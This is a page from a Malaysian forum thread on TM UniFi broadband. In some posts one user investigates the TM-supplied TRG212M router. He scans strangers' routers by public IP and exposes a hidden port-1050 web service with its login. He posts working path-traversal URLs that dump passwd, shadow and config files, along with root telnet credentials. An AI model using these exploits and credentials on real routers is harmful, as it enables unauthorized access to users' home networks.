Welcome Guest ( Log In | Register )

Bump Topic Topic Closed RSS Feed
129 Pages « < 62 63 64 65 66 > » Bottom

Outline · [ Standard ] · Linear+

Unifi Official TM UniFi High Speed Broadband Thread V30, Speed Upgrade Coming. Be Patience Guys

views
     
soonwai
post Mar 30 2017, 06:17 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(biloxee @ Mar 30 2017, 01:48 PM)
My TM supplied router - TRG212M, port 1050 is open by default. Any idea why?
Right now, I'm port forwarding it to non-existent PC...
*
I did further checking on port 1050 on the TRG212M. It's a web server running on port 1050. Very interesting.

118.100.67.125 is a random TRG212M I found on the internet. Can't login, known operator and admin passwords do not work.

CODE
$ telnet 118.100.67.125 1050
Trying 118.100.67.125...
Connected to 118.100.67.125.
Escape character is '^]'.

(null) 400 Bad Request
Server: mini_httpd/1.19 19dec2003
Date: Thu, 30 Mar 2017 10:15:07 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=%s
Connection: close

<HTML>
<HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>400 Bad Request</H4>
Can't parse request.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.
$


user posted image

It remains open even if you disable remote management.

175.144.118.252 is another TRG212M.
CODE
Nmap scan report for 175.144.118.252
Host is up (0.0099s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
1050/tcp open  java-or-OTGfileshare


This post has been edited by soonwai: Mar 30 2017, 06:27 PM
^pomen_GTR^
post Mar 30 2017, 07:49 PM

Regular
******
Senior Member
1,077 posts

Joined: Jan 2013
QUOTE(soonwai @ Mar 30 2017, 06:17 PM)
I did further checking on port 1050 on the TRG212M. It's a web server running on port 1050. Very interesting.

118.100.67.125 is a random TRG212M I found on the internet. Can't login, known operator and admin passwords do not work.

CODE
$ telnet 118.100.67.125 1050
Trying 118.100.67.125...
Connected to 118.100.67.125.
Escape character is '^]'.

(null) 400 Bad Request
Server: mini_httpd/1.19 19dec2003
Date: Thu, 30 Mar 2017 10:15:07 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=%s
Connection: close

<HTML>
<HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>400 Bad Request</H4>
Can't parse request.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.
$


user posted image

It remains open even if you disable remote management.

175.144.118.252 is another TRG212M.
CODE
Nmap scan report for 175.144.118.252
Host is up (0.0099s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
1050/tcp open  java-or-OTGfileshare

*
perhaps it was the default maintenance port on TM center for troubleshoot problem when we call them?
biloxee
post Mar 30 2017, 07:52 PM

On my way
****
Senior Member
561 posts

Joined: Jul 2015
QUOTE(lyt25_1234 @ Mar 30 2017, 05:21 PM)
Thanks for sharing, can I know what router u using?
*
RG-MARITIME-TRG212M
soonwai
post Mar 30 2017, 08:01 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(^pomen_GTR^ @ Mar 30 2017, 07:49 PM)
perhaps it was the default maintenance port on TM center for troubleshoot problem when we call them?
*
I don't think so. If that's the case then it's basically a backdoor for TM. Other TM routers don't have this http server running. In any case TM uses TR069 & FreeACS over vlan209 for remote configuration and the TRG212M supports this.
biloxee
post Mar 30 2017, 08:03 PM

On my way
****
Senior Member
561 posts

Joined: Jul 2015
QUOTE(soonwai @ Mar 30 2017, 06:17 PM)
I did further checking on port 1050 on the TRG212M. It's a web server running on port 1050. Very interesting.

118.100.67.125 is a random TRG212M I found on the internet. Can't login, known operator and admin passwords do not work.
Maybe they changed the password for Operator/Admin?
Mine is not the default password...

Just tried to log in on mine but it won't accept the password that I use for Operator/Admin through LAN...


This post has been edited by biloxee: Mar 30 2017, 08:10 PM
soonwai
post Mar 30 2017, 08:09 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(biloxee @ Mar 30 2017, 08:03 PM)
Maybe they changed the password for Operator/Admin?
Mine is not the default password...
*
I tried both operator and admin with known passwords. I can login at the normal router config webpage but not the one on port 1050.
biloxee
post Mar 30 2017, 08:16 PM

On my way
****
Senior Member
561 posts

Joined: Jul 2015
QUOTE(soonwai @ Mar 30 2017, 08:09 PM)
I tried both operator and admin with known passwords. I can login at the normal router config webpage but not the one on port 1050.
*
Yup, I just tried on mine too. It won't accept my regular pwd that I use for the config page.
Hidden account?

Sigh. I wonder if TM willing to exchange this router...


eternity4av
post Mar 30 2017, 08:41 PM

♥ ♥ ♥ taeyeon
*******
Senior Member
2,270 posts

Joined: Nov 2004
Did anyone from klang managed to get their speed upgraded?
soonwai
post Mar 30 2017, 09:35 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(biloxee @ Mar 30 2017, 08:16 PM)
Yup, I just tried on mine too. It won't accept my regular pwd that I use for the config page.
Hidden account?

Sigh. I wonder if TM willing to exchange this router...
*
Try this for the http server at port 1050.
Username: ccs
Password: Tmacs_1#58

That should get you authenticated and then a blank page.

This post has been edited by soonwai: Mar 30 2017, 09:59 PM
lyt25_1234
post Mar 30 2017, 09:56 PM

Regular
******
Senior Member
1,152 posts

Joined: Jul 2011
QUOTE(biloxee @ Mar 30 2017, 07:52 PM)
RG-MARITIME-TRG212M
*
That's not your router lah, I'm talking about ur wi-fi router

soonwai
post Mar 30 2017, 10:02 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(lyt25_1234 @ Mar 30 2017, 09:56 PM)
That's not your router lah, I'm talking about ur wi-fi router
*
RG-MARITIME-TRG212M is biloxee's wifi router.
lyt25_1234
post Mar 30 2017, 10:03 PM

Regular
******
Senior Member
1,152 posts

Joined: Jul 2011
QUOTE(soonwai @ Mar 30 2017, 10:02 PM)
RG-MARITIME-TRG212M is biloxee's wifi router.
*
Aiks, so he is using latest router or is the DIR-615 newer?
Chriss
post Mar 30 2017, 10:51 PM

*** Lai liao ***
****
Senior Member
634 posts

Joined: Apr 2005
From: Bandar Indera Mahkota


After many rounds of complain finally able to get good speed from my unif**k 100mbps plan mad.gif mad.gif mad.gif
biloxee
post Mar 30 2017, 10:55 PM

On my way
****
Senior Member
561 posts

Joined: Jul 2015
QUOTE(soonwai @ Mar 30 2017, 09:35 PM)
Try this for the http server at port 1050.
Username: ccs
Password: Tmacs_1#58

That should get you authenticated and then a blank page.
*
Same. I get a blank page. Where did you get the user/pwd from?
soonwai
post Mar 30 2017, 11:03 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(biloxee @ Mar 30 2017, 10:55 PM)
Same. I get a blank page. Where did you get the user/pwd from?
*
From /etc/config.xml in the router. You'll have to telnet or ssh in.

It seems like it's something to do with TR069 but not sure why it's exposed to the internet nor why the port cannot be closed.

The password for telnet is root/root obtained with this. The ../../.. part is a well known file traversal vulnerability with many older routers.

http://192.168.0.1:8080/cgi-bin/webproc?getpage=html/../../../var/passwd&var:menu=status&var:page=system_msg
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh

http://192.168.0.1:8080/cgi-bin/webproc?getpage=html/../../../var/shadow&var:menu=status&var:page=system_msg
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Just google $1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI. and you'll find that it is the hash for the string "root"

Verified here:
$ openssl passwd -1 -salt BOYmzSKq root
$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.

This post has been edited by soonwai: Mar 30 2017, 11:31 PM
biloxee
post Mar 30 2017, 11:14 PM

On my way
****
Senior Member
561 posts

Joined: Jul 2015
QUOTE(soonwai @ Mar 30 2017, 11:03 PM)
From /etc/config.xml in the router. You'll have to telnet or ssh in.

It seems like it's something to do with TR069 but not sure why it's exposed to the internet nor why the port cannot be closed.
*
Ok ok, thanks soonwai.
soonwai
post Mar 30 2017, 11:44 PM


********
All Stars
11,458 posts

Joined: Oct 2007
From: KL


QUOTE(biloxee @ Mar 30 2017, 11:14 PM)
Ok ok, thanks soonwai.
*
The user/pass for telnet is root/root. I updated my previous post on how to check it. You can also use tw/tw if it's not commented out.

For some reason, it's not the usual operator user/password that you set in the web config.

Actually, now that I know where config.xml is located, all you need is the URL below:

CODE
http://192.168.0.1/cgi-bin/webproc?getpage=html/../../../etc/config.xml&var:menu=status&var:page=system_msg


This post has been edited by soonwai: Mar 30 2017, 11:54 PM
Dyson Jin
post Mar 30 2017, 11:56 PM

Enthusiast
*****
Senior Member
960 posts

Joined: Mar 2013



QUOTE(eternity4av @ Mar 30 2017, 08:41 PM)
Did anyone from klang managed to get their speed upgraded?
*
yup..got it since last month dy..
area near CIMB CASA Klang Branch
VeeJay
post Mar 31 2017, 12:14 AM

Look at all my stars!!
*******
Senior Member
3,850 posts

Joined: Aug 2005


QUOTE(Chriss @ Mar 30 2017, 10:51 PM)
After many rounds of complain finally able to get good speed from my unif**k 100mbps plan mad.gif  mad.gif  mad.gif
*
What did they do?
Chriss
post Mar 31 2017, 09:35 AM

*** Lai liao ***
****
Senior Member
634 posts

Joined: Apr 2005
From: Bandar Indera Mahkota


QUOTE(VeeJay @ Mar 31 2017, 12:14 AM)
What did they do?
*
I think they do something with the port at the unifi sub station. Their technicians went there & goto my house to do some setting plus reset with their laptop

129 Pages « < 62 63 64 65 66 > » Top
Topic ClosedOptions
 

Change to:
| Lo-Fi Version
0.0314sec    0.70    6 queries    GZIP Disabled
Time is now: 10th December 2025 - 02:59 PM